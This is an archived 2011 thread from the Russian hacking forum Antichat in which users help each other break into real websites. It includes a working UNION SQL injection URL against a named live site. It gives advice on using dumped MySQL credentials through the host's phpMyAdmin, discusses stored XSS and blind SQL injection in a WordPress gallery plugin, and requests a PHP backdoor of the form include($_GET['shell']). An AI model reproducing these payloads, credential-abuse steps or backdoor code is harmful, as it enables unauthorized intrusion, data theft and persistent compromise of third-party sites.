ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.08.2011, 21:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от d1v
d1v said:
там блайнд
Там не блайнд.
JS отключи, или в исходники загляни.
Код:
Code:
http://tinyurl.com/44fsh2n
|
|
|
18.08.2011, 21:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
всё и дальше не идёт только показал,что есть в information_schema!
Код:
Code:
http://tinyurl.com/3nx5tzf
|
|
|
|
18.08.2011, 23:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от None
http://bsgv.ru/ipo_calc.php?bc_tovar_id=2%20and%20null%20union%20 select%201,2,3,4,(select+bc_id+from+binn_catalog2+ limit+0,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,7 0,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86, 87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 ,103,104,105,106,107,108,109,110,111,112,113,114,1 15,116,117,118,119,120,121,122,123,124,125,126,127 ,128,129,130,131,132,133,134,135,136,137,138,139,1 40,141,142,143,144,145,146,147,148,149,150,15--
получаешь 2. Всё норм выводит. Первая таблица пустая.
|
|
|
|
19.08.2011, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
60692
Репутация:
6
|
|
Сообщение от Boobby
Boobby said:
слил с сайта инфу с таблицы mysql.такого типа Host User Password
как найти phpmyadmin? сканеры директорий не помогают
Как найти Phpmyadmin
1) Идем по адресу whois.domaintools.com, смотрим ns-сервера, типа:
ns1.masterhost.ru
ns2.masterhost.ru
Значит хостер masterhost.ru
2) Идем на masterhost.ru
3) Ищем ссылки типа "Помощь", "Саппорт", "FAQ", "ЧаВо" и переходим.
4) В FAQ ищем "Работа с MySQL", "Управление БД" и т.д. И опять переходим!
5) Там хостер показывает адрес phpmyadmin. В нашем случае phpmyadmin.masterhost.ru
6) Заходим и делаем свои дела
|
|
|
|
19.08.2011, 20:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
10960
Репутация:
0
|
|
Уважаемые багоискатели, помогите найти в ниже указанном коде уязвимость.. Есть ли она там? Нашел только активную XSS, и все.. Провести скуль не получается, ибо нет вывода ошибки, и провести блайнд в инсерте, как уже подсказали, нереально.. PHP code execution тоже не выходит.. Может что-то упустил? Помогите..
PHP код:
PHP:
[COLOR="#000000"]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TEMPLATES_TABLE[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'gall_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$gall_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'gall_settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'created'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]]));
if ([/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
/* [/COLOR]');
win.tb_remove();
/* ]]> */
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]$gall_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'gall_settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$templ_description[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$to_update[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$templ_description[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]update[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TEMPLATES_TABLE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$to_update[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$templ_id[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
/* [/COLOR]');
win.tb_remove();
/* ]]> */
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'sc_'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'__'[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key_2[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value_2[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$attr_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$key_2[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$new_value[/COLOR][COLOR="#007700"]= (string)[/COLOR][COLOR="#0000BB"]$value_2[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$settings_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$attr_name[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'0x'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$new_value[/COLOR][COLOR="#007700"]);
}
}
if (empty([/COLOR][COLOR="#0000BB"]$settings_array[/COLOR][COLOR="#007700"])) {
die([/COLOR][COLOR="#DD0000"]'Invalid settings'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgallery_prepare_settings[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings_array[/COLOR][COLOR="#007700"]);
} else {
die([/COLOR][COLOR="#DD0000"]'Invalid template'[/COLOR][COLOR="#007700"]);
}
}
if([/COLOR][COLOR="#0000BB"]fgallery_save_album_settings[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$gall_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
/* */
[COLOR="#0000BB"]
[/COLOR]
[/COLOR]
|
|
|
|
19.08.2011, 21:35
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TEMPLATES_TABLE[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'gall_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$gall_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'gall_settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'created'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]]));
...[/COLOR][/COLOR]
http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
конструкция может прикатить при условии что где-то будет вывод из TEMPLATES_TABLE. а слепую можно замутить с if() и/или benchmark().
__________________
|
|
|
|
19.08.2011, 21:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
10960
Репутация:
0
|
|
Сообщение от +toxa+
+toxa+ said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TEMPLATES_TABLE[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'gall_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$gall_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'gall_settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'created'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'templ_description'[/COLOR][COLOR="#007700"]]));
...[/COLOR][/COLOR]
http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
конструкция может прикатить при условии что где-то будет вывод из TEMPLATES_TABLE. а слепую можно замутить с if() и/или benchmark(). Есть вывод, когда $_GET['action'] = 'load', т.е.
http://localhost/wp/wordpress/wp-content/plugins/gallery/templ.php?gall_id=1&action=load
Тут выводится 'templ_title' и 'templ_description', соответственно получается активная XSS, так как при templs.php?action=save, я в пост запросы без проблем могу передать что угодно, в данном случае javascript.. Код инсертится в БД, а потом при лоаде выводится.. Не совсем вкурил насчет "INSERT ... ON DUPLICATE KEY UPDATE".. Попробую вкурить...
|
|
|
|
19.08.2011, 22:31
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Как шелл в PHP код добавить что то типа
Сообщение от None
include $_GET['shell']
|
|
|
|
19.08.2011, 22:37
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Сообщение от ne0k
ne0k said:
Отобразится как обычный текст. Не катит. Давно бы сделал.
Если же заключать в в теги "" и или "", на странице вывода не отображается, но в исходном коде страницы красуется в розовом цвете, что-то вроде комментария..
Ты чтото путаешь) Я не о том.) Мне нужно дыру сдделать в самом Php коде
|
|
|
|
19.08.2011, 22:38
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Вот вспоминл)) Я о этом имел ввиду
Сообщение от None
if (isset($_GET['shell'])) {
include($_GET['shell'];
}
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?2799188){kind=avatar}
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?2799204){kind=avatar}
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?2799206){kind=avatar}
Похожие темы
Линейный вид
